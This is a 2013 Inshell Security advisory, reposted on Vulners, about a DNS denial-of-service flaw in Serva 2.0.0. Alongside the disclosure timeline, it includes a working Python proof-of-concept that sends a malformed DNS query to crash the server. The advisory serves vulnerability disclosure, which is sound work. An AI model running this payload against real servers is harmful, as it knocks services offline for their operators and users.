Vulners
Lucene search
Serva 2.0.0 DNS Server Denial Of Service
`Inshell Security Advisory
http://www.inshell.net
1. ADVISORY INFORMATION
-----------------------
Product: Serva
Vendor URL: www.vercot.com
Type: Uncaught Exception [CWE-248]
Date found: 2012-07-08
Date published: 2013-01-14
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.
3. VERSIONS AFFECTED
--------------------
Serva 2.0.0, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in
the DNS module.
The Query Name consists of multiple byte fields which contain the length
of the subsequent part of the name query. The application does not
properly validate the first length-field, which could lead to a stack
corruption resulting in a remote denial of service condition.
An attacker needs to send a DNS request with a manipulated length-byte
with a size greater than "\x7F" in the Query Name field to crash the
application.
Since parts of the Tftpd32 v4.0 release are used in Serva, this bug was
ported from the Tftpd32 v4.0 release too
(http://www.securityfocus.com/archive/1/522877).
5. PROOF-OF-CONCEPT (Code / Exploit)
------------------------------------
#!/usr/bin/python
import socket
target="192.168.0.1"
port=53
TransACTID="\x03\xc3"
Flags="\x01\x00"
QuestionRRC="\x00\x01"
AnswerRRC="\x00\x00"
AuthRRC="\x00\x00"
AddRRC="\x00\x00"
QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00"
QueryType="\x00\x01"
QueryClass="\x00\x01"
payload = TransACTID + Flags + QuestionRRC + AnswerRRC + AuthRRC +
AddRRC + QueryName + QueryType + QueryClass
print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
print "[*] Sending malformed request..."
s.sendto(payload,(target,port))
print "[!] Exploit has been sent!\n"
s.close()
For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/33
6. SOLUTION
-----------
None
7. REPORT TIMELINE
------------------
2012-07-08: Initial notification sent to vendor
2012-07-18: Vendor provides bugfix - release to verify that the
vulnerability has been properly fixed
2012-07-22: Inshell confirms that the bug has been fixed
2012-08-29: Inshell asks vendor about the ETA of the planned release
2012-08-29: Vendor states that the release takes a bit longer than expected
2012-10-04: Inshell asks about ETA of the new release
2012-10-04: Vendor states that there will be another delay, because
other features need to be added
2012-11-17: Inshell asks about hotfix solution
2012-11-18: Vendor states that there is no time for releasing a hotfix
2013-01-13: Full Disclosure
8. REFERENCES
-------------
http://security.inshell.net/advisory/33
http://www.securityfocus.com/archive/1/522877
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2013 00:00Current
0.1Low risk
Vulners AI Score0.1